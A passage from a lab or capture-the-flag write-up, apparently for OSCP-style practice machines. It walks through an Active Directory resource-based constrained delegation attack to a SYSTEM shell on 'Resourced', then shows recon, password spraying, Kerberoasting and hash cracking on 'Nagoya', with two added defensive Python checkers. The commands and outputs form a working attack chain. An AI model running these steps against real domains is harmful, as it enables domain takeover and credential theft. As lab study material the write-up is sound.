#### 8.1 Configure the RBCD right
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ sudo python3 /home/chw/Tools/impacket/rbcd.py -dc-ip 192.168.122.175 -t RESOURCEDC -f 'chw' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced.local\\l.livingstone
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Starting Resource Based Constrained Delegation Attack against RESOURCEDC$
[*] Initializing LDAP connection to 192.168.122.175
[*] Using resourced.local\l.livingstone account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Writing SECURITY_DESCRIPTOR related to (fake) computer `chw` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `RESOURCEDC`
[*] Delegation rights modified succesfully!
[*] chw$ can now impersonate users on RESOURCEDC$ via S4U2Proxy
```
> `-dc-ip 192.168.122.175`: IP of the Domain Controller\
> `-t RESOURCEDC`: target host (the machine whose RBCD attribute is written)\
> `-f 'chw'`: the account that is granted the delegation right (chw$)\
> `-hashes :19a3a7550ce8c505c2d46b5e39d6f808`: NTLM hash of the authenticating account, in LMHASH:NTHASH format (LM empty here)\
> `resourced.local\\l.livingstone`: the account used to bind to LDAP and write the attribute (it has GenericAll on the DC)
> > The security descriptor of the newly created machine account chw$ is written into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the target machine RESOURCEDC\
> > So l.livingstone (authenticated with its hash) connects to the DC and modifies the RBCD setting of the RESOURCEDC computer account, so that chw$ can impersonate users to it.
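Since the attribute written here is exactly what a defender audits, here is an added example (not from the writeup and not Impacket's code) that decodes `msDS-AllowedToActOnBehalfOfOtherIdentity` as LDAP returns it, a self-relative security descriptor, and lists which accounts may act on behalf of each computer. The sample descriptor, the `WS01` host and the SID-to-name map are constructed; the `chw$` SID is the one shown by `Get-ADComputer` above.

```python
import struct

# SID of the chw$ machine account as reported by Get-ADComputer in the writeup.
CHW_SID = "S-1-5-21-537427935-490066102-1511301751-4101"

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
# Access mask used for the constructed sample ACE; the audit only needs the
# trustee SIDs, not the mask.
RBCD_MASK = 0x000F01FF


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into the binary SID layout used inside ACEs."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID: %r" % sid)
    rev, auth = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off):
    """Decode the binary SID at buf[off:] back to its string form."""
    rev, count = struct.unpack_from("<BB", buf, off)
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)


def build_rbcd_descriptor(sids):
    """Constructed sample: a self-relative security descriptor whose DACL has
    one ACCESS_ALLOWED ACE per SID, the shape an RBCD configuration stores in
    msDS-AllowedToActOnBehalfOfOtherIdentity."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        # ACE header (type, flags, size) + access mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_MASK) + sid_b
    # ACL header: revision 4 (DS ACL), sbz1, size, ACE count, sbz2
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    # SD header: revision 1, sbz1, control, owner/group/SACL offsets 0 (absent),
    # DACL offset 20 (immediately after the 20-byte header)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20)
    return header + acl


def allowed_to_act_sids(sd):
    """Return the trustee SIDs of every ACCESS_ALLOWED ACE in the DACL of a
    self-relative security descriptor. None/empty attribute -> no delegation."""
    if not sd:
        return []
    rev, _sbz1, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1:
        raise ValueError("unsupported security descriptor revision %d" % rev)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _acl_rev, _sbz, acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    end, pos, sids = off_dacl + acl_size, off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_size < 8 or pos + ace_size > end:
            raise ValueError("malformed ACE at offset %d" % pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, pos + 8))  # skip header (4) + mask (4)
        pos += ace_size
    return sids


def audit_rbcd(computers, sid_names):
    """Map each computer to the account names allowed to act on its behalf.
    `computers` is {name: raw msDS-AllowedToActOnBehalfOfOtherIdentity value}
    as an LDAP search would return it; unknown SIDs are reported verbatim."""
    report = {}
    for name, raw in computers.items():
        sids = allowed_to_act_sids(raw)
        if sids:
            report[name] = [sid_names.get(s, s) for s in sids]
    return report


# Constructed LDAP results: the DC after the rbcd.py run above, plus a
# workstation with the attribute unset. The SID-to-name map is constructed too.
SAMPLE_COMPUTERS = {
    "RESOURCEDC": build_rbcd_descriptor([CHW_SID]),
    "WS01": None,
}
SAMPLE_SID_NAMES = {CHW_SID: "chw$"}

if __name__ == "__main__":
    for host, trustees in audit_rbcd(SAMPLE_COMPUTERS, SAMPLE_SID_NAMES).items():
        print("%s: allowed to act on behalf -> %s" % (host, ", ".join(trustees)))
```

Any computer that shows up in this report, especially a domain controller, with a trustee that is a freshly created machine account is the artefact this section's attack leaves behind.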
#### 8.2 Impersonate Administrator to get a TGS (S4U2Proxy)
Request a Service Ticket (ST) from AD while impersonating Administrator
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ impacket-getST -spn cifs/resourcedc.resourced.local resourced.local/chw\$:'chw' -impersonate Administrator -dc-ip 192.168.122.175
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache
```
> `-spn cifs/resourcedc.resourced.local`: SPN of the target service (here the SMB/CIFS service on RESOURCEDC)\
> `resourced.local/chw\$:'chw'`: identity and password of the impersonating account\
> `-impersonate Administrator`: the user to impersonate\
> `-dc-ip 192.168.122.175`: Domain Controller IP
> > Log in with the machine account chw$ you created (which is now allowed to impersonate)\
> > Pass -impersonate Administrator to request a TGS that represents Administrator for the target service `cifs/resourcedc.resourced.local`.
#### 8.3 Configure `/etc/hosts`
Kerberos TGS requests and SPNs both rely on the correct FQDN
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ sudo sh -c 'echo "192.168.122.175 resourcedc.resourced.local" >> /etc/hosts'
```
#### 8.4 Use PsExec with this TGS to get a SYSTEM shell
Use impacket-psexec with the Kerberos ticket (ccache) to execute commands on the remote host as Administrator and get a shell
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ sudo KRB5CCNAME=Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache impacket-psexec -k -no-pass resourced.local/Administrator@resourcedc.resourced.local -dc-ip 192.168.122.175
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on resourcedc.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file vYQHuTAK.exe
[*] Opening SVCManager on resourcedc.resourced.local.....
[*] Creating service BeKj on resourcedc.resourced.local.....
[*] Starting service BeKj.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
```
> `impacket-psexec`: Impacket tool that works like PsExec, executing commands on the remote host with SYSTEM privileges.\
> `-k`: use Kerberos authentication (together with the ccache)\
> `-no-pass`: no cleartext password; the ticket is enough\
> `resourced.local/Administrator@resourcedc.resourced.local`: domain and target identity\
> the target host is `resourcedc.resourced.local`\
> `-dc-ip 192.168.122.175`: IP of the Domain Controller
> > The `.ccache` ticket obtained above serves as the credential (via -k + KRB5CCNAME), so the login needs no password (-no-pass)\
> > On success it uploads a binary to ADMIN$ over SMB, creates and starts a service through the Service Control Manager, and obtains SYSTEM.
### ✅ Get Root FLAG
# Nagoya

## Solution
### 1. Recon
#### 1.1 Nmap
```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -p- 192.168.122.21
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 04:22 EDT
Stats: 0:03:44 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 9.09% done; ETC: 04:27 (0:01:10 remaining)
Nmap scan report for 192.168.122.21
Host is up (0.097s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Nagoya Industries - Nagoya
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-24 08:26:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nagoya.nagoya-industries.com
| Not valid before: 2025-03-23T08:22:03
|_Not valid after: 2025-09-22T08:22:03
| rdp-ntlm-info:
| Target_Name: NAGOYA-IND
| NetBIOS_Domain_Name: NAGOYA-IND
| NetBIOS_Computer_Name: NAGOYA
| DNS_Domain_Name: nagoya-industries.com
| DNS_Computer_Name: nagoya.nagoya-industries.com
| DNS_Tree_Name: nagoya-industries.com
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-24T08:27:14+00:00
|_ssl-date: 2025-03-24T08:27:54+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: NAGOYA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-24T08:27:16
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.33 seconds
```
> DNS, HTTP, Kerberos, kpasswd5?, RDP (WBT), SMB, LDAP, HTTPAPI, RPC
#### 1.2 Dirb
```
┌──(chw㉿CHW)-[~]
└─$ dirb http://192.168.122.21/
...
---- Scanning URL: http://192.168.122.21/ ----
+ http://192.168.122.21/error (CODE:200|SIZE:3128)
+ http://192.168.122.21/favicon.ico (CODE:200|SIZE:5430)
+ http://192.168.122.21/index (CODE:200|SIZE:3530)
+ http://192.168.122.21/Index (CODE:200|SIZE:3530)
+ http://192.168.122.21/team (CODE:200|SIZE:6896)
```
- Browse http://192.168.122.21/ \

> `info@nagoyaindustries.com`
- Browse http://192.168.122.21/Team \

> Create user.txt from the names on the Team page
#### 1.3 SMB
```
┌──(chw㉿CHW)-[~]
└─$ smbclient -N -L \\\\192.168.122.21\\
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.122.21 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
enum4linux
```
┌──(chw㉿CHW)-[~]
└─$ enum4linux -a 192.168.122.21
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Mar 24 04:36:56 2025
=========================================( Target Information )=========================================
Target ........... 192.168.122.21
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.122.21 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.122.21 )===============================
Looking up status of 192.168.122.21
No reply from 192.168.122.21
...
===============================( Getting domain SID for 192.168.122.21 )===============================
Domain Name: NAGOYA-IND
Domain Sid: S-1-5-21-1969309164-1513403977-1686805993
[+] Host is part of a domain (not a workgroup)
...
===========================( Password Policy Information for 192.168.122.21 )===========================
[E] Unexpected error from polenum:
[+] Attaching to 192.168.122.21 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.122.21)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
...
```
> Domain Name: `NAGOYA-IND`\
> Almost everything is Access Denied
#### 1.4 LDAP
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ crackmapexec smb 192.168.122.21 -u user.txt -p /usr/share/wordlists/rockyou.txt --shares
SMB 192.168.122.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
SMB 192.168.122.21 445 NAGOYA [-] nagoya-industries.com\Matthew.Harrison:123456 STATUS_LOGON_FAILURE
...
```
> This would take forever; not realistic
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ cewl -w custom_wordlist.txt http://192.168.122.21/Team
┌──(chw㉿CHW)-[~/Nagoya]
└─$ crackmapexec smb 192.168.122.21 -u user.txt -p custom_wordlist.txt --shares
┌──(chw㉿CHW)-[~/Nagoya]
└─$ cupp -i
┌──(chw㉿CHW)-[~/Nagoya]
└─$ crackmapexec smb 192.168.122.21 -u user.txt -p matthew.txt --shares
```
> No results
>[!Tip]
>Referring to other people's writeups:
> 1. The password was a wild guess that the machine was released in Summer 2023: `Summer2023` ?!!
> 2. cewl & CUPP (2023, Nagoya, seasons): `Summer2023` ?!!
> \
> Current OSCP AD machines provide a set of credentials to log in with, so treat this as that situation and keep going\
> Password spraying finds the user that this password belongs to:\
> `crackmapexec smb 192.168.122.21 -u user.txt -p "Summer2023" --shares`
> > `Fiona.Clark:Summer2023`
> > ```
> > Share           Permissions     Remark
> > -----           -----------     ------
> > ADMIN$                          Remote Admin
> > C$                              Default share
> > IPC$            READ            Remote IPC
> > NETLOGON        READ            Logon server share
> > SYSVOL          READ            Logon server share
> > ```
### 2. Login SMB & RDP
#### 2.1 Login SMB
```
┌──(chw㉿CHW)-[~/Nagoya/SMB_SYSVOL]
└─$ smbclient //192.168.122.21/SYSVOL -U "nagoya-industries.com\Fiona.Clark%Summer2023" -c "prompt OFF; recurse ON; mget *"
...
┌──(chw㉿CHW)-[~/Nagoya/SMB_SYSVOL]
└─$ tree
.
└── nagoya-industries.com
├── DfsrPrivate
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
└── ResetPassword
├── ResetPassword.exe
├── ResetPassword.exe.config
├── System.IO.FileSystem.AccessControl.dll
├── System.IO.FileSystem.AccessControl.xml
├── System.Security.AccessControl.dll
├── System.Security.AccessControl.xml
├── System.Security.Permissions.dll
├── System.Security.Permissions.xml
├── System.Security.Principal.Windows.dll
└── System.Security.Principal.Windows.xml
18 directories, 15 files
┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON]
└─$ smbclient //192.168.122.21/NETLOGON -U "nagoya-industries.com\Fiona.Clark%Summer2023" -c "prompt OFF; recurse ON; mget *"
...
┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON]
└─$ tree
.
└── ResetPassword
├── ResetPassword.exe
├── ResetPassword.exe.config
├── System.IO.FileSystem.AccessControl.dll
├── System.IO.FileSystem.AccessControl.xml
├── System.Security.AccessControl.dll
├── System.Security.AccessControl.xml
├── System.Security.Permissions.dll
├── System.Security.Permissions.xml
├── System.Security.Principal.Windows.dll
└── System.Security.Principal.Windows.xml
2 directories, 10 files
```
> - `SMB_SYSVOL/nagoya-industries.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf`\
> 
#### 2.2 Login RDP
```
┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON]
└─$ xfreerdp /u:Fiona.Clark /p:Summer2023 /v:192.168.122.21
[06:31:09:792] [1582278:1582279] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:31:09:792] [1582278:1582279] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:31:12:958] [1582278:1582279] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:31:12:958] [1582278:1582279] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:31:12:958] [1582278:1582279] [ERROR][com.freerdp.core] - freerdp_post_connect failed
┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON]
└─$ rdesktop 192.168.122.21
...
```
> rdesktop can connect, so presumably `Fiona.Clark` does not have RDP permission
### 3. Login RPC
```
┌──(chw㉿CHW)-[~/Nagoya/SMB_SYSVOL]
└─$ rpcclient -U "nagoya-industries.com\\Fiona.Clark" 192.168.122.21
Password for [NAGOYA-INDUSTRIES.COM\Fiona.Clark]:
rpcclient $> netshareenum
result was WERR_ACCESS_DENIED
rpcclient $> lsaquery
Domain Name: NAGOYA-IND
Domain Sid: S-1-5-21-1969309164-1513403977-1686805993
rpcclient $> getdompwinfo
min_password_length: 7
password_properties: 0x00000001
DOMAIN_PASSWORD_COMPLEX
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_helpdesk] rid:[0x450]
user:[Matthew.Harrison] rid:[0x452]
user:[Emma.Miah] rid:[0x453]
user:[Rebecca.Bell] rid:[0x454]
user:[Scott.Gardner] rid:[0x455]
user:[Terry.Edwards] rid:[0x456]
user:[Holly.Matthews] rid:[0x457]
user:[Anne.Jenkins] rid:[0x458]
user:[Brett.Naylor] rid:[0x459]
user:[Melissa.Mitchell] rid:[0x45a]
user:[Craig.Carr] rid:[0x45b]
user:[Fiona.Clark] rid:[0x45c]
user:[Patrick.Martin] rid:[0x45d]
user:[Kate.Watson] rid:[0x45e]
user:[Kirsty.Norris] rid:[0x45f]
user:[Andrea.Hayes] rid:[0x460]
user:[Abigail.Hughes] rid:[0x461]
user:[Melanie.Watson] rid:[0x462]
user:[Frances.Ward] rid:[0x463]
user:[Sylvia.King] rid:[0x464]
user:[Wayne.Hartley] rid:[0x465]
user:[Iain.White] rid:[0x467]
user:[Joanna.Wood] rid:[0x468]
user:[Bethan.Webster] rid:[0x469]
user:[Elaine.Brady] rid:[0x46b]
user:[Christopher.Lewis] rid:[0x46c]
user:[Megan.Johnson] rid:[0x46d]
user:[Damien.Chapman] rid:[0x46e]
user:[Joanne.Lewis] rid:[0x46f]
user:[svc_mssql] rid:[0x470]
user:[svc_tpl] rid:[0x471]
user:[svc_web] rid:[0x472]
rpcclient $> queryuser 0x1f4
User Name : Administrator
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Mon, 24 Mar 2025 07:50:13 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Mon, 01 May 2023 11:43:05 EDT
Password can change Time : Tue, 02 May 2023 11:43:05 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000021
padding1[0..7]...
logon_hrs[0..21]...
```
> 1. `netshareenum`: listing shares gives ACCESS_DENIED
> 2. `enumdomusers`: all users
> 3. Inspect `Administrator`
> 4. Password policy: at least 7 characters, complexity enabled (requires any two of upper case, lower case, digits and symbols)
> > Build ADuser.txt
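As an added illustration (not from the writeup), the policy values reported by `getdompwinfo` above can be decoded and candidate passwords checked against them; the complexity check implements the rule as Microsoft documents it (three of the five character categories, and no samAccountName or display-name token inside the password), which a seasonal password such as `Summer2023` still satisfies. Flag values are the MS-SAMR DOMAIN_PASSWORD_* constants; the candidate passwords are constructed.

```python
"""Decode the domain password policy reported by rpcclient's getdompwinfo
and test candidate passwords against it. Added example; not from the writeup."""
import re
from typing import List, Tuple

# DOMAIN_PASSWORD_* bits of password_properties (MS-SAMR DOMAIN_PASSWORD_INFORMATION).
PASSWORD_PROPERTY_FLAGS = {
    0x00000001: "DOMAIN_PASSWORD_COMPLEX",
    0x00000002: "DOMAIN_PASSWORD_NO_ANON_CHANGE",
    0x00000004: "DOMAIN_PASSWORD_NO_CLEAR_CHANGE",
    0x00000008: "DOMAIN_LOCKOUT_ADMINS",
    0x00000010: "DOMAIN_PASSWORD_STORE_CLEARTEXT",
    0x00000020: "DOMAIN_REFUSE_PASSWORD_CHANGE",
}


def decode_password_properties(value: int) -> List[str]:
    """Names of the flags set in password_properties (0x1 above = complexity on)."""
    return [name for bit, name in PASSWORD_PROPERTY_FLAGS.items() if value & bit]


def character_categories(pw: str) -> int:
    """Count the five character categories the Windows complexity rule looks at."""
    upper = any(c.isupper() for c in pw)
    lower = any(c.islower() for c in pw)
    digit = any(c.isdigit() for c in pw)
    special = any(not c.isalnum() for c in pw)
    # Alphabetic characters with no case (e.g. CJK scripts) form the fifth category.
    other_alpha = any(c.isalpha() and not c.isupper() and not c.islower() for c in pw)
    return sum([upper, lower, digit, special, other_alpha])


def meets_policy(pw: str, min_length: int, properties: int,
                 sam_account_name: str = "", display_name: str = "") -> Tuple[bool, List[str]]:
    """Return (ok, reasons) for a candidate under the given policy values."""
    reasons = []
    if len(pw) < min_length:
        reasons.append(f"shorter than {min_length} characters")
    if properties & 0x1:  # DOMAIN_PASSWORD_COMPLEX
        if character_categories(pw) < 3:
            reasons.append("fewer than three of the five character categories")
        lowered = pw.lower()
        # Microsoft's rule: the samAccountName (3+ chars) and any display-name
        # token of 3+ chars must not appear in the password, case-insensitively.
        if len(sam_account_name) >= 3 and sam_account_name.lower() in lowered:
            reasons.append("contains the samAccountName")
        for token in re.split(r"[,.\-_ #\t]+", display_name):
            if len(token) >= 3 and token.lower() in lowered:
                reasons.append(f"contains display-name token {token!r}")
    return (not reasons, reasons)


# Values taken from the getdompwinfo output above.
MIN_PASSWORD_LENGTH = 7
PASSWORD_PROPERTIES = 0x00000001

if __name__ == "__main__":
    print(decode_password_properties(PASSWORD_PROPERTIES))
    # Constructed candidates, checked against the account found on this box.
    for candidate in ("Summer2023", "summer2023", "Clark2023!", "Xk9#vLq2pT"):
        ok, why = meets_policy(candidate, MIN_PASSWORD_LENGTH, PASSWORD_PROPERTIES,
                               sam_account_name="Fiona.Clark", display_name="Fiona Clark")
        print(f"{candidate:12} {'passes' if ok else 'fails: ' + '; '.join(why)}")
```

The takeaway is that complexity and a 7-character minimum do not exclude predictable season-plus-year passwords; a banned-password list or longer minimum is what blocks them.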
### 4. Kerberos AS-REP Roasting
Shows which accounts do not require pre-authentication and so return a TGT hash
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ cat ADuser.txt
Administrator
Guest
krbtgt
svc_helpdesk
Matthew.Harrison
Emma.Miah
Rebecca.Bell
...
┌──(chw㉿CHW)-[~/Nagoya]
└─$ impacket-GetNPUsers nagoya-industries.com/ -usersfile ADuser.txt -no-pass -format hashcat -dc-ip 192.168.122.21
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User svc_helpdesk doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Matthew.Harrison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Emma.Miah doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Rebecca.Bell doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Scott.Gardner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Terry.Edwards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Holly.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Anne.Jenkins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brett.Naylor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Melissa.Mitchell doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Craig.Carr doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Fiona.Clark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Patrick.Martin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kate.Watson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kirsty.Norris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Andrea.Hayes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Abigail.Hughes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Melanie.Watson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frances.Ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sylvia.King doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Wayne.Hartley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Iain.White doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Joanna.Wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bethan.Webster doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elaine.Brady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Christopher.Lewis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Megan.Johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Damien.Chapman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Joanne.Lewis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_mssql doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_tpl doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_web doesn't have UF_DONT_REQUIRE_PREAUTH set
```
> All of these accounts require Kerberos pre-authentication, so AS-REP Roasting is not possible
Kerberoasting the service accounts to obtain TGS hashes
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ impacket-GetUserSPNs nagoya-industries.com/Fiona.Clark:Summer2023 -dc-ip 192.168.122.21 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------- ------------ ------------------------------------------------ -------------------------- -------------------------- ----------
http/nagoya.nagoya-industries.com svc_helpdesk CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com 2023-04-30 03:31:06.190955 <never>
MSSQL/nagoya.nagoya-industries.com svc_mssql 2023-04-30 03:45:33.288595 2024-08-01 21:48:41.441299
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_helpdesk*$5df1df04fc339ba3ebb25fc662d504be$...
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$43af99de389c9a1a62eb95d0b7b6d6b3$...
```
> Successfully obtained TGS hashes for two service accounts (svc_helpdesk and svc_mssql)
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ echo 'svc_helpdesk HASH' > helpdesk.hash
┌──(chw㉿CHW)-[~/Nagoya]
└─$ echo 'svc_mssql HASH' > mssql.hash
┌──(chw㉿CHW)-[~/Nagoya]
└─$ hashcat -m 13100 -a 0 helpdesk.hash /usr/share/wordlists/rockyou.txt --force
...
┌──(chw㉿CHW)-[~/Nagoya]
└─$ hashcat -m 13100 -a 0 mssql.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5tgs$23$*svc_mssql...:Service1
```
> svc_mssql:Service1
